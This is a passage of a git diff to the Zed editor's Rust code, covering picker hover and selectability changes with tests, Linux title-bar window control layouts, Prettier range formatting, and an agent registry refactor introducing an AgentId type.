-// Fallback -fn text_threads_dir_fallback() -> &'static PathBuf { - static CONTEXTS_DIR: OnceLock = OnceLock::new(); - CONTEXTS_DIR.get_or_init(|| { - if cfg!(target_os = "macos") { - config_dir().join("conversations") - } else { - data_dir().join("conversations") - } - }) -} -/// Returns the path to the contexts directory. -/// -/// This is where the saved contexts from the Assistant are stored. -pub fn text_threads_dir() -> &'static PathBuf { - let fallback_dir = text_threads_dir_fallback(); - if fallback_dir.exists() { - return fallback_dir; - } - static CONTEXTS_DIR: OnceLock = OnceLock::new(); - CONTEXTS_DIR.get_or_init(|| state_dir().join("conversations")) -} - /// Returns the path to the contexts directory. /// /// This is where the prompts for use with the Assistant are stored. @@ -419,12 +395,6 @@ pub fn copilot_dir() -> &'static PathBuf { COPILOT_DIR.get_or_init(|| data_dir().join("copilot")) } -/// Returns the path to the Supermaven directory. -pub fn supermaven_dir() -> &'static PathBuf { - static SUPERMAVEN_DIR: OnceLock = OnceLock::new(); - SUPERMAVEN_DIR.get_or_init(|| data_dir().join("supermaven")) -} - /// Returns the path to the default Prettier directory. 
pub fn default_prettier_dir() -> &'static PathBuf { static DEFAULT_PRETTIER_DIR: OnceLock = OnceLock::new(); diff --git a/crates/picker/Cargo.toml b/crates/picker/Cargo.toml index f85c55b9f27bcb8fd87101c341058e1a3962934e..7c01e8bfaa13447eccb42f42f69a09b332193676 100644 --- a/crates/picker/Cargo.toml +++ b/crates/picker/Cargo.toml @@ -22,14 +22,13 @@ menu.workspace = true schemars.workspace = true serde.workspace = true theme.workspace = true +theme_settings.workspace = true ui.workspace = true ui_input.workspace = true workspace.workspace = true zed_actions.workspace = true [dev-dependencies] -ctor.workspace = true editor = { workspace = true, features = ["test-support"] } -env_logger.workspace = true gpui = { workspace = true, features = ["test-support"] } -serde_json.workspace = true +settings.workspace = true diff --git a/crates/picker/src/picker.rs b/crates/picker/src/picker.rs index 716653d89642fe6d8f457f145ed15b8972432a09..eba5b3096194fe8a3379efeb9b230a6004cd2e36 100644 --- a/crates/picker/src/picker.rs +++ b/crates/picker/src/picker.rs @@ -16,7 +16,7 @@ use serde::Deserialize; use std::{ cell::Cell, cell::RefCell, collections::HashMap, ops::Range, rc::Rc, sync::Arc, time::Duration, }; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::{ Color, Divider, DocumentationAside, DocumentationSide, Label, ListItem, ListItemSpacing, ScrollAxes, Scrollbars, WithScrollbar, prelude::*, utils::WithRemSize, v_flex, @@ -114,13 +114,16 @@ pub trait PickerDelegate: Sized + 'static { None } fn can_select( - &mut self, + &self, _ix: usize, _window: &mut Window, _cx: &mut Context>, ) -> bool { true } + fn select_on_hover(&self) -> bool { + true + } // Allows binding some optional effect to when the selection changes. 
fn selected_index_changed( @@ -619,6 +622,9 @@ impl Picker { ) { cx.stop_propagation(); window.prevent_default(); + if !self.delegate.can_select(ix, window, cx) { + return; + } self.set_selected_index(ix, None, false, window, cx); self.do_confirm(secondary, window, cx) } @@ -753,10 +759,11 @@ impl Picker { ix: usize, ) -> impl IntoElement + use { let item_bounds = self.item_bounds.clone(); + let selectable = self.delegate.can_select(ix, window, cx); div() .id(("item", ix)) - .cursor_pointer() + .when(selectable, |this| this.cursor_pointer()) .child( canvas( move |bounds, _window, _cx| { @@ -784,6 +791,14 @@ impl Picker { this.handle_click(ix, event.modifiers.platform, window, cx) }), ) + .when(self.delegate.select_on_hover(), |this| { + this.on_hover(cx.listener(move |this, hovered: &bool, window, cx| { + if *hovered { + this.set_selected_index(ix, None, false, window, cx); + cx.notify(); + } + })) + }) .children(self.delegate.render_match( ix, ix == self.delegate.selected_index(), @@ -850,6 +865,175 @@ impl Picker { } } +#[cfg(test)] +mod tests { + use super::*; + use gpui::TestAppContext; + use std::cell::Cell; + + struct TestDelegate { + items: Vec, + selected_index: usize, + confirmed_index: Rc>>, + } + + impl TestDelegate { + fn new(items: Vec) -> Self { + Self { + items, + selected_index: 0, + confirmed_index: Rc::new(Cell::new(None)), + } + } + } + + impl PickerDelegate for TestDelegate { + type ListItem = ui::ListItem; + + fn match_count(&self) -> usize { + self.items.len() + } + + fn selected_index(&self) -> usize { + self.selected_index + } + + fn set_selected_index( + &mut self, + ix: usize, + _window: &mut Window, + _cx: &mut Context>, + ) { + self.selected_index = ix; + } + + fn can_select( + &self, + ix: usize, + _window: &mut Window, + _cx: &mut Context>, + ) -> bool { + self.items.get(ix).copied().unwrap_or(false) + } + + fn placeholder_text(&self, _window: &mut Window, _cx: &mut App) -> Arc { + "Test".into() + } + + fn update_matches( + &mut self, 
+ _query: String, + _window: &mut Window, + _cx: &mut Context>, + ) -> Task<()> { + Task::ready(()) + } + + fn confirm( + &mut self, + _secondary: bool, + _window: &mut Window, + _cx: &mut Context>, + ) { + self.confirmed_index.set(Some(self.selected_index)); + } + + fn dismissed(&mut self, _window: &mut Window, _cx: &mut Context>) {} + + fn render_match( + &self, + ix: usize, + selected: bool, + _window: &mut Window, + _cx: &mut Context>, + ) -> Option { + Some( + ui::ListItem::new(ix) + .inset(true) + .toggle_state(selected) + .child(ui::Label::new(format!("Item {ix}"))), + ) + } + } + + fn init_test(cx: &mut TestAppContext) { + cx.update(|cx| { + let store = settings::SettingsStore::test(cx); + cx.set_global(store); + theme_settings::init(theme::LoadThemes::JustBase, cx); + editor::init(cx); + }); + } + + #[gpui::test] + async fn test_clicking_non_selectable_item_does_not_confirm(cx: &mut TestAppContext) { + init_test(cx); + + let confirmed_index = Rc::new(Cell::new(None)); + let (picker, cx) = cx.add_window_view(|window, cx| { + let mut delegate = TestDelegate::new(vec![true, false, true]); + delegate.confirmed_index = confirmed_index.clone(); + Picker::uniform_list(delegate, window, cx) + }); + + picker.update(cx, |picker, _cx| { + assert_eq!(picker.delegate.selected_index(), 0); + }); + + picker.update_in(cx, |picker, window, cx| { + picker.handle_click(1, false, window, cx); + }); + assert!( + confirmed_index.get().is_none(), + "clicking a non-selectable item should not confirm" + ); + + picker.update_in(cx, |picker, window, cx| { + picker.handle_click(0, false, window, cx); + }); + assert_eq!( + confirmed_index.get(), + Some(0), + "clicking a selectable item should confirm" + ); + } + + #[gpui::test] + async fn test_keyboard_navigation_skips_non_selectable_items(cx: &mut TestAppContext) { + init_test(cx); + + let (picker, cx) = cx.add_window_view(|window, cx| { + Picker::uniform_list(TestDelegate::new(vec![true, false, true]), window, cx) + }); + + 
picker.update(cx, |picker, _cx| { + assert_eq!(picker.delegate.selected_index(), 0); + }); + + picker.update_in(cx, |picker, window, cx| { + picker.select_next(&menu::SelectNext, window, cx); + }); + picker.update(cx, |picker, _cx| { + assert_eq!( + picker.delegate.selected_index(), + 2, + "select_next should skip non-selectable item at index 1" + ); + }); + + picker.update_in(cx, |picker, window, cx| { + picker.select_previous(&menu::SelectPrevious, window, cx); + }); + picker.update(cx, |picker, _cx| { + assert_eq!( + picker.delegate.selected_index(), + 0, + "select_previous should skip non-selectable item at index 1" + ); + }); + } +} + impl EventEmitter for Picker {} impl ModalView for Picker {} diff --git a/crates/platform_title_bar/Cargo.toml b/crates/platform_title_bar/Cargo.toml index 43ad6166929bc463edbea878941ba19ffe2ea3a9..7ecc624a3224025749b65d631031e3e8bf639052 100644 --- a/crates/platform_title_bar/Cargo.toml +++ b/crates/platform_title_bar/Cargo.toml @@ -19,6 +19,7 @@ project.workspace = true settings.workspace = true smallvec.workspace = true theme.workspace = true +theme_settings.workspace = true ui.workspace = true workspace.workspace = true zed_actions.workspace = true diff --git a/crates/platform_title_bar/src/platform_title_bar.rs b/crates/platform_title_bar/src/platform_title_bar.rs index 7053fe89e7fdc6ece9ad50fdd8facaf31dba3086..c009d146403b21e592457d0c9a3f24819e80d642 100644 --- a/crates/platform_title_bar/src/platform_title_bar.rs +++ b/crates/platform_title_bar/src/platform_title_bar.rs @@ -1,11 +1,11 @@ -mod platforms; +pub mod platforms; mod system_window_tabs; use feature_flags::{AgentV2FeatureFlag, FeatureFlagAppExt}; use gpui::{ - AnyElement, App, Context, Decorations, Entity, Hsla, InteractiveElement, IntoElement, - MouseButton, ParentElement, StatefulInteractiveElement, Styled, Window, WindowControlArea, div, - px, + Action, AnyElement, App, Context, Decorations, Entity, Hsla, InteractiveElement, IntoElement, + MouseButton, 
ParentElement, StatefulInteractiveElement, Styled, WeakEntity, Window, + WindowButtonLayout, WindowControlArea, div, px, }; use project::DisableAiSettings; use settings::Settings; @@ -15,6 +15,7 @@ use ui::{ prelude::*, utils::{TRAFFIC_LIGHT_PADDING, platform_title_bar_height}, }; +use workspace::{MultiWorkspace, SidebarRenderState, SidebarSide}; use crate::{ platforms::{platform_linux, platform_windows}, @@ -31,8 +32,8 @@ pub struct PlatformTitleBar { children: SmallVec<[AnyElement; 2]>, should_move: bool, system_window_tabs: Entity, - workspace_sidebar_open: bool, - sidebar_has_notifications: bool, + button_layout: Option, + multi_workspace: Option>, } impl PlatformTitleBar { @@ -46,11 +47,20 @@ impl PlatformTitleBar { children: SmallVec::new(), should_move: false, system_window_tabs, - workspace_sidebar_open: false, - sidebar_has_notifications: false, + button_layout: None, + multi_workspace: None, } } + pub fn with_multi_workspace(mut self, multi_workspace: WeakEntity) -> Self { + self.multi_workspace = Some(multi_workspace); + self + } + + pub fn set_multi_workspace(&mut self, multi_workspace: WeakEntity) { + self.multi_workspace = Some(multi_workspace); + } + pub fn title_bar_color(&self, window: &mut Window, cx: &mut Context) -> Hsla { if cfg!(any(target_os = "linux", target_os = "freebsd")) { if window.is_window_active() && !self.should_move { @@ -70,34 +80,104 @@ impl PlatformTitleBar { self.children = children.into_iter().collect(); } + pub fn set_button_layout(&mut self, button_layout: Option) { + self.button_layout = button_layout; + } + + fn effective_button_layout( + &self, + decorations: &Decorations, + cx: &App, + ) -> Option { + if self.platform_style == PlatformStyle::Linux + && matches!(decorations, Decorations::Client { .. 
}) + { + self.button_layout.or_else(|| cx.button_layout()) + } else { + None + } + } + pub fn init(cx: &mut App) { SystemWindowTabs::init(cx); } - pub fn is_workspace_sidebar_open(&self) -> bool { - self.workspace_sidebar_open + fn sidebar_render_state(&self, cx: &App) -> SidebarRenderState { + self.multi_workspace + .as_ref() + .and_then(|mw| mw.upgrade()) + .map(|mw| mw.read(cx).sidebar_render_state(cx)) + .unwrap_or_default() } - pub fn set_workspace_sidebar_open(&mut self, open: bool, cx: &mut Context) { - self.workspace_sidebar_open = open; - cx.notify(); + pub fn is_multi_workspace_enabled(cx: &App) -> bool { + cx.has_flag::() && !DisableAiSettings::get_global(cx).disable_ai } +} - pub fn sidebar_has_notifications(&self) -> bool { - self.sidebar_has_notifications +/// Renders the platform-appropriate left-side window controls (e.g. Ubuntu/GNOME close button). +/// +/// Only relevant on Linux with client-side decorations when the window manager +/// places controls on the left. +pub fn render_left_window_controls( + button_layout: Option, + close_action: Box, + window: &Window, +) -> Option { + if PlatformStyle::platform() != PlatformStyle::Linux { + return None; } - - pub fn set_sidebar_has_notifications( - &mut self, - has_notifications: bool, - cx: &mut Context, - ) { - self.sidebar_has_notifications = has_notifications; - cx.notify(); + if !matches!(window.window_decorations(), Decorations::Client { .. }) { + return None; } + let button_layout = button_layout?; + if button_layout.left[0].is_none() { + return None; + } + Some( + platform_linux::LinuxWindowControls::new( + "left-window-controls", + button_layout.left, + close_action, + ) + .into_any_element(), + ) +} - pub fn is_multi_workspace_enabled(cx: &App) -> bool { - cx.has_flag::() && !DisableAiSettings::get_global(cx).disable_ai +/// Renders the platform-appropriate right-side window controls (close, minimize, maximize). 
+/// +/// Returns `None` on Mac or when the platform doesn't need custom controls +/// (e.g. Linux with server-side decorations). +pub fn render_right_window_controls( + button_layout: Option, + close_action: Box, + window: &Window, +) -> Option { + let decorations = window.window_decorations(); + let height = platform_title_bar_height(window); + + match PlatformStyle::platform() { + PlatformStyle::Linux => { + if !matches!(decorations, Decorations::Client { .. }) { + return None; + } + let button_layout = button_layout?; + if button_layout.right[0].is_none() { + return None; + } + Some( + platform_linux::LinuxWindowControls::new( + "right-window-controls", + button_layout.right, + close_action, + ) + .into_any_element(), + ) + } + PlatformStyle::Windows => { + Some(platform_windows::WindowsWindowControls::new(height).into_any_element()) + } + PlatformStyle::Mac => None, } } @@ -110,8 +190,8 @@ impl Render for PlatformTitleBar { let close_action = Box::new(workspace::CloseWindow); let children = mem::take(&mut self.children); - let is_multiworkspace_sidebar_open = - PlatformTitleBar::is_multi_workspace_enabled(cx) && self.is_workspace_sidebar_open(); + let button_layout = self.effective_button_layout(&decorations, cx); + let sidebar = self.sidebar_render_state(cx); let title_bar = h_flex() .window_control_area(WindowControlArea::Drag) @@ -159,12 +239,23 @@ impl Render for PlatformTitleBar { }) }) .map(|this| { + let show_left_controls = !(sidebar.open && sidebar.side == SidebarSide::Left); + if window.is_fullscreen() { this.pl_2() - } else if self.platform_style == PlatformStyle::Mac - && !is_multiworkspace_sidebar_open - { + } else if self.platform_style == PlatformStyle::Mac && show_left_controls { this.pl(px(TRAFFIC_LIGHT_PADDING)) + } else if let Some(controls) = show_left_controls + .then(|| { + render_left_window_controls( + button_layout, + close_action.as_ref().boxed_clone(), + window, + ) + }) + .flatten() + { + this.child(controls) } else { this.pl_2() } 
@@ -172,11 +263,14 @@ impl Render for PlatformTitleBar { .map(|el| match decorations { Decorations::Server => el, Decorations::Client { tiling, .. } => el - .when(!(tiling.top || tiling.right), |el| { - el.rounded_tr(theme::CLIENT_SIDE_DECORATION_ROUNDING) - }) .when( - !(tiling.top || tiling.left) && !is_multiworkspace_sidebar_open, + !(tiling.top || tiling.right) + && !(sidebar.open && sidebar.side == SidebarSide::Right), + |el| el.rounded_tr(theme::CLIENT_SIDE_DECORATION_ROUNDING), + ) + .when( + !(tiling.top || tiling.left) + && !(sidebar.open && sidebar.side == SidebarSide::Left), |el| el.rounded_tl(theme::CLIENT_SIDE_DECORATION_ROUNDING), ) // this border is to avoid a transparent gap in the rounded corners @@ -199,25 +293,30 @@ impl Render for PlatformTitleBar { .children(children), ) .when(!window.is_fullscreen(), |title_bar| { - match self.platform_style { - PlatformStyle::Mac => title_bar, - PlatformStyle::Linux => { - if matches!(decorations, Decorations::Client { .. }) { - title_bar - .child(platform_linux::LinuxWindowControls::new(close_action)) - .when(supported_controls.window_menu, |titlebar| { - titlebar - .on_mouse_down(MouseButton::Right, move |ev, window, _| { - window.show_window_menu(ev.position) - }) - }) - } else { - title_bar - } - } - PlatformStyle::Windows => { - title_bar.child(platform_windows::WindowsWindowControls::new(height)) - } + let show_right_controls = !(sidebar.open && sidebar.side == SidebarSide::Right); + + let title_bar = title_bar.children( + show_right_controls + .then(|| { + render_right_window_controls( + button_layout, + close_action.as_ref().boxed_clone(), + window, + ) + }) + .flatten(), + ); + + if self.platform_style == PlatformStyle::Linux + && matches!(decorations, Decorations::Client { .. 
}) + { + title_bar.when(supported_controls.window_menu, |titlebar| { + titlebar.on_mouse_down(MouseButton::Right, move |ev, window, _| { + window.show_window_menu(ev.position) + }) + }) + } else { + title_bar } }); diff --git a/crates/platform_title_bar/src/platforms/platform_linux.rs b/crates/platform_title_bar/src/platforms/platform_linux.rs index 0e7af80f80e8dcbea03a3b3375f1e4dfd7ca2f37..8dd6c6f6787ddab703963188beaaae1288ca6d6f 100644 --- a/crates/platform_title_bar/src/platforms/platform_linux.rs +++ b/crates/platform_title_bar/src/platforms/platform_linux.rs @@ -1,46 +1,83 @@ -use gpui::{Action, Hsla, MouseButton, prelude::*, svg}; +use gpui::{ + Action, AnyElement, Hsla, MAX_BUTTONS_PER_SIDE, MouseButton, WindowButton, prelude::*, svg, +}; use ui::prelude::*; #[derive(IntoElement)] pub struct LinuxWindowControls { - close_window_action: Box, + id: &'static str, + buttons: [Option; MAX_BUTTONS_PER_SIDE], + close_action: Box, } impl LinuxWindowControls { - pub fn new(close_window_action: Box) -> Self { + pub fn new( + id: &'static str, + buttons: [Option; MAX_BUTTONS_PER_SIDE], + close_action: Box, + ) -> Self { Self { - close_window_action, + id, + buttons, + close_action, } } } impl RenderOnce for LinuxWindowControls { fn render(self, window: &mut Window, cx: &mut App) -> impl IntoElement { + let is_maximized = window.is_maximized(); + let supported_controls = window.window_controls(); + let button_elements: Vec = self + .buttons + .iter() + .filter_map(|b| *b) + .filter(|button| match button { + WindowButton::Minimize => supported_controls.minimize, + WindowButton::Maximize => supported_controls.maximize, + WindowButton::Close => true, + }) + .map(|button| { + create_window_button(button, button.id(), is_maximized, &*self.close_action, cx) + }) + .collect(); + h_flex() - .id("generic-window-controls") - .px_3() - .gap_3() - .on_mouse_down(MouseButton::Left, |_, _, cx| cx.stop_propagation()) - .child(WindowControl::new( - "minimize", - 
WindowControlType::Minimize, - cx, - )) - .child(WindowControl::new( - "maximize-or-restore", - if window.is_maximized() { - WindowControlType::Restore - } else { - WindowControlType::Maximize - }, - cx, - )) - .child(WindowControl::new_close( - "close", - WindowControlType::Close, - self.close_window_action, - cx, - )) + .id(self.id) + .when(!button_elements.is_empty(), |el| { + el.gap_3() + .px_3() + .on_mouse_down(MouseButton::Left, |_, _, cx| cx.stop_propagation()) + .children(button_elements) + }) + } +} + +fn create_window_button( + button: WindowButton, + id: &'static str, + is_maximized: bool, + close_action: &dyn Action, + cx: &mut App, +) -> AnyElement { + match button { + WindowButton::Minimize => { + WindowControl::new(id, WindowControlType::Minimize, cx).into_any_element() + } + WindowButton::Maximize => WindowControl::new( + id, + if is_maximized { + WindowControlType::Restore + } else { + WindowControlType::Maximize + }, + cx, + ) + .into_any_element(), + WindowButton::Close => { + WindowControl::new_close(id, WindowControlType::Close, close_action.boxed_clone(), cx) + .into_any_element() + } } } diff --git a/crates/platform_title_bar/src/system_window_tabs.rs b/crates/platform_title_bar/src/system_window_tabs.rs index a9bf46cc4f9f33586d1129dec1c64a67f1e42198..f465d2ab8476eb1c834f32e1d0eb72cc468dc230 100644 --- a/crates/platform_title_bar/src/system_window_tabs.rs +++ b/crates/platform_title_bar/src/system_window_tabs.rs @@ -5,7 +5,7 @@ use gpui::{ Styled, SystemWindowTab, SystemWindowTabController, Window, WindowId, actions, canvas, div, }; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::{ Color, ContextMenu, DynamicSpacing, IconButton, IconButtonShape, IconName, IconSize, Label, LabelSize, Tab, h_flex, prelude::*, right_click_menu, diff --git a/crates/prettier/src/prettier.rs b/crates/prettier/src/prettier.rs index 90f512a5931fa89ac9b8a2216091f3633f872b6b..be4b35a6450eec645fde1343d4e9d27f0a695ef1 100644 --- 
a/crates/prettier/src/prettier.rs +++ b/crates/prettier/src/prettier.rs @@ -2,14 +2,14 @@ use anyhow::Context as _; use collections::{HashMap, HashSet}; use fs::Fs; use gpui::{AsyncApp, Entity}; -use language::language_settings::PrettierSettings; -use language::{Buffer, Diff, Language, language_settings::language_settings}; +use language::language_settings::{LanguageSettings, PrettierSettings}; +use language::{Buffer, Diff, Language, OffsetUtf16}; use lsp::{LanguageServer, LanguageServerId}; use node_runtime::NodeRuntime; use paths::default_prettier_dir; use serde::{Deserialize, Serialize}; use std::{ - ops::ControlFlow, + ops::{ControlFlow, Range}, path::{Path, PathBuf}, sync::Arc, time::Duration, @@ -48,6 +48,8 @@ const TAILWIND_PRETTIER_PLUGIN_PACKAGE_NAME: &str = "prettier-plugin-tailwindcss #[cfg(any(test, feature = "test-support"))] pub const FORMAT_SUFFIX: &str = "\nformatted by test prettier"; +#[cfg(any(test, feature = "test-support"))] +pub const RANGE_FORMAT_SUFFIX: &str = "\nrange formatted by test prettier"; impl Prettier { pub const CONFIG_FILE_NAMES: &'static [&'static str] = &[ @@ -348,6 +350,7 @@ impl Prettier { buffer: &Entity, buffer_path: Option, ignore_dir: Option, + range_utf16: Option>, request_timeout: Duration, cx: &mut AsyncApp, ) -> anyhow::Result { @@ -356,7 +359,7 @@ impl Prettier { let params = buffer .update(cx, |buffer, cx| { let buffer_language = buffer.language().map(|language| language.as_ref()); - let language_settings = language_settings(buffer_language.map(|l| l.name()), buffer.file(), cx); + let language_settings = LanguageSettings::for_buffer(&buffer, cx); let prettier_settings = &language_settings.prettier; anyhow::ensure!( prettier_settings.allowed, @@ -478,6 +481,8 @@ impl Prettier { plugins, prettier_options, ignore_path, + range_start: range_utf16.as_ref().map(|r| r.start.0), + range_end: range_utf16.as_ref().map(|r| r.end.0), }, }) }) @@ -501,15 +506,9 @@ impl Prettier { { Some("rust") => anyhow::bail!("prettier does 
not support Rust"), Some(_other) => { - let mut formatted_text = buffer.text() + FORMAT_SUFFIX; - let buffer_language = buffer.language().map(|language| language.as_ref()); - let language_settings = language_settings( - buffer_language.map(|l| l.name()), - buffer.file(), - cx, - ); + let language_settings = LanguageSettings::for_buffer(buffer, cx); let prettier_settings = &language_settings.prettier; let parser = prettier_parser_name( buffer_path.as_deref(), @@ -517,9 +516,29 @@ impl Prettier { prettier_settings, )?; - if let Some(parser) = parser { - formatted_text = format!("{formatted_text}\n{parser}"); - } + let formatted_text = if let Some(range) = &range_utf16 { + let text = buffer.text(); + let start_byte = buffer.offset_utf16_to_offset(range.start); + let insert_at = text[start_byte..] + .find('\n') + .map(|pos| start_byte + pos) + .unwrap_or(text.len()); + let mut suffix = RANGE_FORMAT_SUFFIX.to_string(); + if let Some(parser) = &parser { + suffix = format!("{suffix}\n{parser}"); + } + let mut result = String::new(); + result.push_str(&text[..insert_at]); + result.push_str(&suffix); + result.push_str(&text[insert_at..]); + result + } else { + let mut text = buffer.text() + FORMAT_SUFFIX; + if let Some(parser) = &parser { + text = format!("{text}\n{parser}"); + } + text + }; Ok(buffer.diff(formatted_text, cx)) } @@ -655,6 +674,10 @@ struct FormatOptions { path: Option, prettier_options: Option>, ignore_path: Option, + #[serde(skip_serializing_if = "Option::is_none")] + range_start: Option, + #[serde(skip_serializing_if = "Option::is_none")] + range_end: Option, } #[derive(Clone, Debug, Eq, PartialEq, Serialize, Deserialize)] diff --git a/crates/prettier/src/prettier_server.js b/crates/prettier/src/prettier_server.js index b3d8a660a40d6f629ba63847f5e00d91046b7cd7..917095fea6896f18459b9ba024dfc183a1e28314 100644 --- a/crates/prettier/src/prettier_server.js +++ b/crates/prettier/src/prettier_server.js @@ -199,12 +199,21 @@ async function handleMessage(message, 
prettier) { ? resolvedConfig.plugins : params.options.plugins; + const rangeOptions = {}; + if (params.options.rangeStart != null) { + rangeOptions.rangeStart = params.options.rangeStart; + } + if (params.options.rangeEnd != null) { + rangeOptions.rangeEnd = params.options.rangeEnd; + } + const options = { ...(params.options.prettierOptions || prettier.config), ...resolvedConfig, plugins, parser: params.options.parser, filepath: params.options.filepath, + ...rangeOptions }; process.stderr.write( `Resolved config: ${JSON.stringify(resolvedConfig)}, will format file '${ diff --git a/crates/project/Cargo.toml b/crates/project/Cargo.toml index cbcd5481ee3c48655fc78e17d5cf65d2ec978a09..cd037786a399eb979fd5d9053c57efe3100dd473 100644 --- a/crates/project/Cargo.toml +++ b/crates/project/Cargo.toml @@ -31,7 +31,6 @@ test-support = [ "worktree/test-support", "gpui/test-support", "dap/test-support", - "dap_adapters/test-support", ] [dependencies] @@ -46,6 +45,7 @@ client.workspace = true clock.workspace = true collections.workspace = true context_server.workspace = true +credentials_provider.workspace = true dap.workspace = true extension.workspace = true fancy-regex.workspace = true @@ -92,11 +92,13 @@ terminal.workspace = true text.workspace = true toml.workspace = true url.workspace = true +percent-encoding.workspace = true util.workspace = true watch.workspace = true wax.workspace = true which.workspace = true worktree.workspace = true +zed_credentials_provider.workspace = true zeroize.workspace = true zlog.workspace = true ztracing.workspace = true @@ -105,12 +107,10 @@ tracing.workspace = true [dev-dependencies] client = { workspace = true, features = ["test-support"] } encoding_rs.workspace = true -db = { workspace = true, features = ["test-support"] } collections = { workspace = true, features = ["test-support"] } context_server = { workspace = true, features = ["test-support"] } buffer_diff = { workspace = true, features = ["test-support"] } dap = { workspace = 
true, features = ["test-support"] } -dap_adapters = { workspace = true, features = ["test-support"] } fs = { workspace = true, features = ["test-support"] } git2.workspace = true gpui = { workspace = true, features = ["test-support"] } diff --git a/crates/project/src/agent_registry_store.rs b/crates/project/src/agent_registry_store.rs index a6fc56b7dadaeb0e89443479c108d999d70b37bd..b2010da65d9477859eceab166de6e0819617e4da 100644 --- a/crates/project/src/agent_registry_store.rs +++ b/crates/project/src/agent_registry_store.rs @@ -11,18 +11,19 @@ use http_client::{AsyncBody, HttpClient}; use serde::Deserialize; use settings::Settings as _; -use crate::agent_server_store::AllAgentServersSettings; +use crate::{AgentId, DisableAiSettings}; const REGISTRY_URL: &str = "https://cdn.agentclientprotocol.com/registry/v1/latest/registry.json"; const REFRESH_THROTTLE_DURATION: Duration = Duration::from_secs(60 * 60); #[derive(Clone, Debug)] pub struct RegistryAgentMetadata { - pub id: SharedString, + pub id: AgentId, pub name: SharedString, pub description: SharedString, pub version: SharedString, pub repository: Option, + pub website: Option, pub icon_path: Option, } @@ -55,7 +56,7 @@ impl RegistryAgent { } } - pub fn id(&self) -> &SharedString { + pub fn id(&self) -> &AgentId { &self.metadata().id } @@ -75,6 +76,10 @@ impl RegistryAgent { self.metadata().repository.as_ref() } + pub fn website(&self) -> Option<&SharedString> { + self.metadata().website.as_ref() + } + pub fn icon_path(&self) -> Option<&SharedString> { self.metadata().icon_path.as_ref() } @@ -129,13 +134,11 @@ impl AgentRegistryStore { let store = cx.new(|cx| Self::new(fs, http_client, cx)); cx.set_global(GlobalAgentRegistryStore(store.clone())); - if AllAgentServersSettings::get_global(cx).has_registry_agents() { - store.update(cx, |store, cx| { - if store.agents.is_empty() { - store.refresh(cx); - } - }); - } + store.update(cx, |store, cx| { + if store.agents.is_empty() { + store.refresh(cx); + } + }); store } 
@@ -149,12 +152,34 @@ impl AgentRegistryStore { .map(|store| store.0.clone()) } + #[cfg(any(test, feature = "test-support"))] + pub fn init_test_global(cx: &mut App, agents: Vec) -> Entity { + let fs: Arc = fs::FakeFs::new(cx.background_executor().clone()); + let store = cx.new(|_cx| Self { + fs, + http_client: http_client::FakeHttpClient::with_404_response(), + agents, + is_fetching: false, + fetch_error: None, + pending_refresh: None, + last_refresh: None, + }); + cx.set_global(GlobalAgentRegistryStore(store.clone())); + store + } + + #[cfg(any(test, feature = "test-support"))] + pub fn set_agents(&mut self, agents: Vec, cx: &mut Context) { + self.agents = agents; + cx.notify(); + } + pub fn agents(&self) -> &[RegistryAgent] { &self.agents } - pub fn agent(&self, id: &str) -> Option<&RegistryAgent> { - self.agents.iter().find(|agent| agent.id().as_ref() == id) + pub fn agent(&self, id: &AgentId) -> Option<&RegistryAgent> { + self.agents.iter().find(|agent| agent.id() == id) } pub fn is_fetching(&self) -> bool { @@ -173,6 +198,10 @@ impl AgentRegistryStore { return; } + if DisableAiSettings::get_global(cx).disable_ai { + return; + } + self.is_fetching = true; self.fetch_error = None; self.last_refresh = Some(Instant::now()); @@ -249,6 +278,10 @@ impl AgentRegistryStore { http_client: Arc, cx: &mut Context, ) { + if DisableAiSettings::get_global(cx).disable_ai { + return; + } + cx.spawn(async move |this, cx| -> Result<()> { let cache_path = registry_cache_path(); if !fs.is_file(&cache_path).await { @@ -342,11 +375,12 @@ async fn build_registry_agents( .await?; let metadata = RegistryAgentMetadata { - id: entry.id.into(), + id: AgentId::new(entry.id), name: entry.name.into(), description: entry.description.into(), version: entry.version.into(), repository: entry.repository.map(Into::into), + website: entry.website.map(Into::into), icon_path, }; @@ -546,6 +580,8 @@ struct RegistryEntry { #[serde(default)] repository: Option, #[serde(default)] + website: Option, + 
#[serde(default)] icon: Option, distribution: RegistryDistribution, } diff --git a/crates/project/src/agent_server_store.rs b/crates/project/src/agent_server_store.rs index b0c10086cac1c39c4570b416e790df85cdc55cf0..0b6bb2b739f677ca1f4f3d5558538372ec6e86ff 100644 --- a/crates/project/src/agent_server_store.rs +++ b/crates/project/src/agent_server_store.rs @@ -1,7 +1,6 @@ use remote::Interactive; use std::{ any::Any, - borrow::Borrow, path::{Path, PathBuf}, sync::Arc, time::Duration, @@ -13,6 +12,7 @@ use fs::Fs; use gpui::{AsyncApp, Context, Entity, EventEmitter, SharedString, Subscription, Task}; use http_client::{HttpClient, github::AssetKind}; use node_runtime::NodeRuntime; +use percent_encoding::percent_decode_str; use remote::RemoteClient; use rpc::{ AnyProtoClient, TypedEnvelope, @@ -21,12 +21,15 @@ use rpc::{ use schemars::JsonSchema; use serde::{Deserialize, Serialize}; use settings::{RegisterSetting, SettingsStore}; -use task::Shell; +use sha2::{Digest, Sha256}; +use url::Url; use util::{ResultExt as _, debug_panic}; use crate::ProjectEnvironment; use crate::agent_registry_store::{AgentRegistryStore, RegistryAgent, RegistryTargetConfig}; +use crate::worktree_store::WorktreeStore; + #[derive(Deserialize, Serialize, Clone, PartialEq, Eq, JsonSchema)] pub struct AgentServerCommand { #[serde(rename = "command")] @@ -61,28 +64,43 @@ impl std::fmt::Debug for AgentServerCommand { } } -#[derive(Clone, Debug, PartialEq, Eq, Hash, PartialOrd, Ord)] -pub struct ExternalAgentServerName(pub SharedString); +#[derive( + Clone, Debug, PartialEq, Eq, Hash, PartialOrd, Ord, Serialize, Deserialize, JsonSchema, +)] +#[serde(transparent)] +pub struct AgentId(pub SharedString); + +impl AgentId { + pub fn new(id: impl Into) -> Self { + AgentId(id.into()) + } +} -impl std::fmt::Display for ExternalAgentServerName { +impl std::fmt::Display for AgentId { fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { write!(f, "{}", self.0) } } -impl From<&'static str> for 
